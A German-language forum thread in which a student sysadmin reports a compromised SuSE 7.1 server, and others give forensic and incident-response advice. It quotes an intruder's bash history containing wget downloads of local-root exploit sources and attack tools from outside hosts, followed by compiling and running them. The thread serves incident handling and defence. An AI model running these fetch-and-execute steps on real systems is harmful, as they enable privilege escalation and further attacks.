So jetzt ist es passiert,
ich bin studentischer Sysadmin in einer Werbeagentur, und habe den Anruf bekommen von unserem Provider bekommen, dass von unserem Server ein SSH-Angriff auf ein anderen Server durchgenommen werden sollte.

Natürlich besteht auch die Möglichkeit des Spoofens, aber wie kann ich jetzt anhand von Logfiles feststellen, dass dies nicht so war?

Eingesetzt wird auf dem Server Suse 7.1

Grüße dt2158

kurz gesagt, wie kann ich rootkits (so heißen die dinger doch ) aufspüren?

Suchfunktion: "chkrootkit OR rkhunter"

HTH
Wolfgang

1. Stecker ziehen (am besten den vom Netzwerk)

2. RO booten von einer Knoppicilin oder anderen LiveDistri mit entsprechenden Tools

3. rkhunter, chkrootkit, tripwire (wenn schon im Einsatz gewesen), ...

4. forensiche Loganalyse - Lücken, Einträge, ...

5. bei geringstem begründetem Verdacht: BACKUP, neu aufsetzen, absichern.

6. Distri mit aktuell verfügbaren Updates einsetzen -> SuSE 7.1 ist "a bisserl alt" ;-)


Edit: Tippwulis, Ergänzungen

ach ja - so blöde und paranoid das klingt: jeden verhören, der einen Account auf die Kiste hatte. Evtl. kam der Angriff nicht durch einen externen Bösen Buben, sondern von intern über einen regulären Account...

Passworte ändern und so versteht sich glaube ich von alleine...

werd ich machen, kann man anhand von logfiles die ssh sessions sehen?
sshd logins stehen in /var/log/messages sind klar, anders rum jedoch nicht (verbindungen nach außen auf port 22) ????

sshd logins stehen in /var/log/messages sind klar, anders rum jedoch nicht (verbindungen nach außen auf port 22) ????

man iptables

Aber da man dieser Kiste eh nimmer trauen kann, hilft nur: Weg vom Netz!

Dieser Link hier *Link reich* (http://www.heise.de/security/result.xhtml?url=/security/artikel/46297&words=Forensik) kann für dich auch nützlich sein.
Ansonsten ganz klar : Kompromittiertes System immer weg vom Netz

also hab das ding mit knoppix, ausprobiert keine rootkits gefunden aber dafür bei "last"

einen user dana, welcher mal mitarbeiter war, ich vermute dass das pw zu schwach war und es im netz per bf geknackt wurde.
Es gibt sonst keinen User, der an der Console hier arbeiten würde.



root pts/1 grafik6 Tue Apr 5 09:51 still logged in
reboot system boot 2.4.0-4GB Tue Apr 5 09:50 (00:37)
root pts/0 grafik6 Tue Apr 5 09:27 - down (00:11)
reboot system boot 2.4.0-4GB Tue Apr 5 09:26 (00:12)
reboot system boot 2.4.0-4GB Tue Apr 5 09:22 (00:00)
root pts/6 grafik6 Tue Apr 5 08:28 - down (00:51)
dana pts/6 real.bad.boyz.ho Mon Apr 4 05:03 - 05:10 (00:06)
dana pts/6 real.bad.boyz.ho Thu Mar 31 23:35 - 06:49 (07:14)
root pts/6 grafik6 Wed Mar 30 12:10 - 12:24 (00:14)
dana pts/6 shonin.rex.gr.jp Tue Mar 29 22:56 - 22:56 (00:00)
dana pts/5 mc.ventforet.co. Mon Mar 28 14:19 - 14:24 (00:04)
XXXX pts/6 dialin-212-144-1 Sun Mar 27 19:39 - 19:47 (00:08)
XXXX pts/5 dialin-212-144-1 Sun Mar 27 19:36 - 19:47 (00:10)
dana pts/5 am-062-204-205-1 Fri Mar 25 20:28 - 20:28 (00:00)
dana pts/5 real.bad.boyz.ho Thu Mar 24 19:28 - 19:28 (00:00)
dana pts/6 desarrollo.alfan Thu Mar 24 17:47 - 17:53 (00:06)
dana pts/5 desarrollo.alfan Thu Mar 24 17:46 - 17:53 (00:07)
root pts/5 grafik6 Thu Mar 24 09:45 - 10:37 (00:51)


die xxxx bin ich von zu hause aus!

dann hat dieser jemand folgende befehle in der *.bash_history hinterlassen :D


exit
w
cat /etc/issue
w
cat /etc/issue
exit
w
ls
uname -a
ftp 217.10.193.x
tar zxvf 90.tgz
chmod +x pw
./90
./pw
ls
./TTdummyfile
chmod 777 TTdummyfile
./TTdummyfile
exit
mkdir /tmp/' '
cd /tmp/' '
wget www.hostname.ro/nou.tgz
tar zxvf nou.tgz
cd nou
m -rf uniq.txt
rm -rf uniq.txt
wget www.hostname.ro/uniq/uniq1.txt
wget www.hostname.ro/uniq/uniq.txt
cat uniq1.txt >> uniq.txt
ls
./atac 100
ls
cat vuln.txt
ping 62.131.100.x
hostname -i
ifconfig
/sbin/ifconfig
cat /etc/hosts
ssh -l dana 212.21.94.x
ls
wget XX
http://gst.void.ru/exp/stackgrow.c
gcc
wget http://gst.void.ru/exp/stackgrow.c
gcc stackgrow.c -o st
./st
rm -rf st
wget http://gst.void.ru/exp/binfmt.c
gcc binfmt.c -o bm
ls
uname -a
wget http://gst.void.ru/exp/lr.2.4.20.c
gcc lr.2.4.20.c -o lr
cat r.2.4.20.c
cat lr.2.4.20.c
wget http://gst.void.ru/exp/mmap
chmod +x mmap
./mmap
rm -rf mmap


habe alle ips, mit x versehen, xx ist unsere IP

keine anhung was da für tools installiert wurden, kann dies einer nachvollziehen, die laufen natürlich nun nicht mehr! was nun, habe alles per screenshots dokumentiert und ausgabe von bash_history und last in dateien gesichert.
Was nun ??

Daten (wenn möglich komplett - z.B. Platte ausbauen und 'ne neue rein) sichern und Kiste neu aufsetzen.

Und evtl. überlegen, Anzeige zu erstatten (wird aber vermutlich im Sande verlaufen)

das problem ist, das ist so spontan nicht möglich!!!!, die daten sind ständig in gebrauch, auch ist soweit kein weiteres scsi system hier für die platten!

Nimm mal den "worst case" an; das war kein Scriptkiddie, sondern ein Konkurrent, der jetzt seine Finger in euerm System hat. Egal, ob die Daten in Gebrauch sind, die Kiste muss neu aufgesetzt werden. Auf jeden Fall mus sie vom Netz. Es ist bitter, ich weiss, aber will dein Chef jedes seiner Angebote von einem Konkurrenten um entscheidende 10% unterboten sehen? :ugly:

Die Vertrauenswürdigkeit des Rechners ist hin, da ist nix dran zu machen. Zur Not zieh' die Daten auf einen anderen Rechener temporär um, aber setz' um Himmels willen den Rechner komplett neu auf, wenn du nicht absolut _restlos_ verstehst, was der Angreifer gemacht hat, und sicher bist, dass es da nicht noch weitere Dinge gibt, die du noch nicht gefunden hast.

eine frage für die zukunft ist auch, ob gcc auf einem server etwas zu suchen hat :)

eine frage für die zukunft ist auch, ob gcc auf einem server etwas zu suchen hat :)
Ja, hat er. Und wenn du ihn nicht installiert hast, lässt sich ruckzuck eine komplette Entwicklungsumgebung mit einem normalen Account einrichten.

wget http://gst.void.ru/exp/stackgrow.c
gcc stackgrow.c -o st
./st
rm -rf st
wget http://gst.void.ru/exp/binfmt.c
gcc binfmt.c -o bm
ls
uname -a
wget http://gst.void.ru/exp/lr.2.4.20.c
gcc lr.2.4.20.c -o lr
cat r.2.4.20.c
cat lr.2.4.20.c
wget http://gst.void.ru/exp/mmap
chmod +x mmap
./mmap
rm -rf mmap


Hier wurden verschiedene exploits heruntergeladen un ausgeführt, netterweise hinterher wieder gelöscht :)
was das fuer exploits sind muesste man sich mal ansehn, der ausführung nach zu urteilen auf jedenfall localexploits, also zb um seine Rechte zu steigern.



wget www.hostname.ro/uniq/uniq1.txt
wget www.hostname.ro/uniq/uniq.txt
cat uniq1.txt >> uniq.txt


2 listen mit IPs (scans) die zu einer zusammengefügt wurden, ich schätze mal um von deinem server aus ein (oder mehrere) exploit(s) an diesen IPs zu testen, das könnte bedeuten dass eins der runtergeladenen programme ein programm darstellt dass fuer alle diese IPs aus dem textfile das exploit anwendet oder etwas ähnliches.

Alles nur vermutung, wie gesagt man müsste mal sehn was fuer exploits das sind.

EDIT:

stackgrow: expand_stack SMP race local root exploit
lr.2.4.20.c: Linux Kernel Module Loader Local R00t Exploit

also wie ich es mir dachte um die rechte zu steigern, eine rootshell zu bekommen.
Du kannst aber auf jeden fall davon ausgehen dass der eindringling kein anfänger war, also sind rootkits etc auf gar keinen fall auszuschließen

Hi,

also ich hatte auch mal in der alten Firma so einen alten SuSE 7.x Root Server, der gehackt worden ist. Das Problem bei den runtergeladenen Rootkits ist, dass die meistens virenversucht sind (siehe mal hier: Linux-Virus Linux/OSF-8759 (http://www.viruslibrary.com/virusinfo/Linux.OSF.8759.htm)). Damals habe ich die mit keinem Scanner entfernen können.
Also wie bereits angesprochen die Kiste vom Netz, die Daten sichern und eine neue Kiste aufsetzen. Alternativen gibt's da sonst keine akzeptablen.

2 listen mit IPs (scans) die zu einer zusammengefügt wurden, ich schätze mal um von deinem server aus ein (oder mehrere) exploit(s) an diesen IPs zu testen, das könnte bedeuten dass eins der runtergeladenen programme ein programm darstellt dass fuer alle diese IPs aus dem textfile das exploit anwendet oder etwas ähnliches.

Sieht so aus als würde das wohl Stimmen, das jemand von dem Server aus jemand anders Angegriffen hat...

dass es exploits sind hatte ich auch schon festgestellt, ich habe heut meinem chef nochmal die dringlichkeit erzählt, und das ding werde ich freitag neu aufsetzen (dürfen), vielleicht werd ich ihn aber morgen direkt mal vom netz nehmen und eine extra notfall-router kiste aufsetzen, damit kein direkter zugriff mehr möglich ist